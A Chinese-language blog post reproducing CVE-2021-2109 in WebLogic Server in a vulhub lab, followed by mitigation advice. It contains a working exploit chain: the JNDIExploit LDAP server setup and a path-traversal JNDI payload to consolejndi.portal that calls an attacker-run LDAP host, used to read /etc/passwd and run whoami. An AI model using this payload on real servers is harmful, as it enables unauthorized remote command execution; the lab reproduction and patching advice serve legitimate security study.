Weblogic Server远程代码执行漏洞复现（CVE-2021-2109）

gclome

原文链接：Weblogic Server远程代码执行漏洞复现（CVE-2021-2109）

0x00 前言


模板太占用空间，以后写文章不用模板了，直接上内容。这次的漏洞复现比较简单，细节不再赘述。

0x01影响版本

WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0

0x02 环境搭建

漏洞环境可以直接用vulnhub里现成的。

1. git clone https://github.com/vulhub/vulhub.git
   
2. cd vulhub/weblogic/CVE-2020-14882
   
3. sudo docker-compose up -d

复制代码

​

访问 http://xxx.xxx.xxx.xxx:7001
​

0x03漏洞利用
访问http://xxx.xxx.xxx.xxx:7001/cons ... /consolejndi.portal
如果此页面未授权可访问，而且weblogic是受影响的版本，那么此处有可能存在漏洞。
​

之后需要启动LDAP

1. https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 #下载地址
   
2. unzip JNDIExploit.v1.11.zip
   
3. java -jar JNDIExploit.v1.11.jar -i xxx.xxx.xxx.xxx #启动

复制代码

​

然后我们可以用burp进行抓包，抓包的时候注意下8080端口可能被占用，我们在系统代理设置里随便改个数就行，比如8081。
我们所用到payload：

1. /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)

复制代码

把xxx.xxx.xxx;xxx:1389改成自己的地址就可以，千万注意，第三个分隔符是分号。

我们用这段payload对数据包进行修改，并加上自己要执行的命令，如下：

成功显示/etc/passwd的内容
​

成功执行whoami
​

0x04 安全建议

1、禁用T3协议
如果您不依赖T3协议进行JVM通信，可通过暂时阻断T3协议缓解此漏洞带来的影响
1). 进入Weblogic控制台，在base_domain配置页面中，进入“安全”选项卡页面，点击“筛选器”，配置筛选器。
2). 在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则框中输入：* * 7001 deny t3 t3s。

2、禁止启用IIOP
登陆Weblogic控制台，找到启用IIOP选项，取消勾选，重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁